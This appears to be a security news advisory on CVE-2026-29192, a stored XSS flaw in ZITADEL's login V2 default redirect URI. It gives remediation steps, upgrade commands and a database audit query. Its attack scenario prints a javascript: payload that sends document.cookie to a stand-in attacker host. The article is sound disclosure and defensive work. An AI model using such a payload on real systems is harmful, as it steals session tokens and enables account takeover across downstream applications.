Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

429+ Articles
114+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-29192: ZITADEL Stored XSS via Default Redirect URI
CVE-2026-29192: ZITADEL Stored XSS via Default Redirect URI
SECURITYHIGHCVE-2026-29192

CVE-2026-29192: ZITADEL Stored XSS via Default Redirect URI

A stored cross-site scripting vulnerability in ZITADEL's login V2 interface allows organization administrators to inject malicious JavaScript via a...

Dylan H.

Security Team

March 8, 2026
5 min read

Affected Products

  • ZITADEL 4.0.0 - 4.11.1

ZITADEL Stored XSS in Default Redirect URI Targets All Logged-In Users

ZITADEL, an open-source identity management and SSO platform, has disclosed CVE-2026-29192, a stored cross-site scripting (XSS) vulnerability that allows a malicious organization administrator to inject persistent JavaScript into the login V2 interface. Any user who authenticates through the compromised ZITADEL instance after the payload is planted will have the script execute in their browser — enabling token theft and full account takeover.

The vulnerability has a CVSS score of 7.7 and affects ZITADEL versions 4.0.0 through 4.11.1. The patch is included in version 4.12.0, released March 7, 2026.


Vulnerability Details

AttributeValue
CVE IDCVE-2026-29192
CVSS Score7.7 (High)
CVSS VectorAV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N
CWECWE-79: Cross-Site Scripting
Attack TypeStored XSS via Default Redirect URI configuration
Authentication RequiredYes — organization administrator role
User InteractionNone (victims are affected on normal login)
Affected VersionsZITADEL 4.0.0 – 4.11.1
Patched VersionZITADEL 4.12.0
Disclosure DateMarch 7, 2026

How the Attack Works

Root Cause

ZITADEL's login V2 interface allows organization administrators to configure a default redirect URI — a URL to which users are sent after successful authentication if no application-specific redirect is provided. This value is stored in the database and rendered in the login UI on subsequent user visits.

The vulnerability lies in insufficient sanitization of the default redirect URI before rendering it in the DOM. An administrator who can set this value can inject a JavaScript URI (javascript:...) or an HTML event handler, which is then stored and executed in every user's browser session when they log in.

Attack Scenario

1. Attacker compromises or is a malicious organization administrator
2. Attacker sets the default redirect URI to a JavaScript payload:
   javascript:fetch('https://attacker.example.com/steal?c='+document.cookie)
3. The malicious value is stored in ZITADEL's database
4. Every subsequent user who logs in through this ZITADEL organization:
   — The login V2 UI renders the stored URI without sanitization
   — JavaScript executes automatically in the user's browser
   — Session cookies, OIDC tokens, or other browser data are exfiltrated
5. Attacker uses harvested tokens to impersonate victims

Why This Matters Despite Requiring Admin Access

Although exploiting this vulnerability requires organization administrator privileges, the threat model remains significant:

  • Compromised admin credentials — A separate breach (phishing, credential stuffing, or another ZITADEL vulnerability) could give an attacker admin access, which they then leverage to implant this stored XSS for persistent, broad account harvesting
  • Malicious insider — An administrator with malicious intent can silently plant the payload and harvest tokens from all users without visible disruption
  • Chained exploitation — Combined with other ZITADEL vulnerabilities disclosed on the same date (CVE-2026-29193, which allows unauthorized self-registration with elevated policies), an attacker may escalate to admin before planting this payload
  • Scope escalation — Because ZITADEL is an identity provider, XSS within its origin can steal tokens valid for all downstream applications — the blast radius extends far beyond ZITADEL itself

Affected Versions

ZITADEL VersionStatusAction
4.0.0 – 4.11.1VulnerableUpgrade to 4.12.0
4.12.0+PatchedNo action required
< 4.0.0Not affectedLogin V2 not present

Remediation

Upgrade to ZITADEL 4.12.0

ZITADEL 4.12.0 applies strict validation and sanitization to the default redirect URI field, blocking javascript: URIs and other dangerous schemes from being stored or rendered.

# Docker
docker pull ghcr.io/zitadel/zitadel:v4.12.0
 
# Helm (Kubernetes)
helm upgrade zitadel zitadel/zitadel \
  --set image.tag=v4.12.0
 
# Verify deployment
kubectl rollout status deployment/zitadel

Interim Controls

Until upgrade is possible:

  1. Audit the default redirect URI — Check the current value in your ZITADEL organization settings and ensure it points to a legitimate application URL, not a javascript: URI or external domain
  2. Restrict administrator access — Apply least-privilege principles; limit who can modify organization-level settings
  3. Review administrator audit logs — Look for recent changes to redirect URI configuration
  4. Enable MFA for all accounts — Session tokens obtained via XSS can be used for API calls; MFA does not protect against token theft but raises the cost of full account access

Audit Query

Check for suspicious redirect URI values in your ZITADEL database:

-- PostgreSQL — check for javascript: URIs or suspicious redirect values
SELECT org_id, redirect_uri, change_date
FROM default_login_policy
WHERE redirect_uri ILIKE 'javascript:%'
   OR redirect_uri ILIKE 'data:%'
   OR redirect_uri NOT LIKE 'https://%';

Broader ZITADEL Security Context

CVE-2026-29192 is part of a batch of four ZITADEL vulnerabilities disclosed on March 7, 2026, all affecting the login V2 interface:

CVECVSSTypeAttacker Precondition
CVE-2026-291919.3 CriticalXSS via /saml-postUnauthenticated
CVE-2026-290678.1 HighPassword reset header injectionUnauthenticated
CVE-2026-291927.7 HighStored XSS via default redirect URIOrg Admin
CVE-2026-29193TBDPolicy bypass / unauthorized self-registrationUnauthenticated

The simultaneous disclosure of multiple login V2 vulnerabilities suggests a focused security audit of the ZITADEL codebase, likely triggered by a security researcher or vendor-commissioned review. Organizations running ZITADEL should prioritize the 4.12.0 upgrade as it addresses all four CVEs in a single release.


Sources

  • NVD — CVE-2026-29192
  • GitLab Advisory Database — CVE-2026-29192
  • Vulert — CVE-2026-29192
  • ZITADEL Login V2 XSS Coverage — TheHackerWire
  • Zitadel Security Vulnerabilities 2026 — Stack.Watch
#ZITADEL#CVE#Stored XSS#Account Takeover#Identity Provider#Vulnerability#Security Updates

Related Articles

CVE-2026-29067: ZITADEL Password Reset Poisoned by

A high-severity host header injection vulnerability in ZITADEL's login V2 password reset flow allows attackers to redirect reset links to...

5 min read

ZITADEL Critical XSS in SAML Endpoint Enables 1-Click

A critical cross-site scripting vulnerability in ZITADEL's login V2 /saml-post endpoint allows unauthenticated attackers to execute arbitrary JavaScript...

5 min read

CVE-2015-20115: RealtyScript 4.0.2 Stored XSS via File Upload in Admin Panel

CVE-2015-20115 is a stored cross-site scripting vulnerability in RealtyScript 4.0.2 that allows authenticated attackers to upload malicious script files...

5 min read
Back to all Security Alerts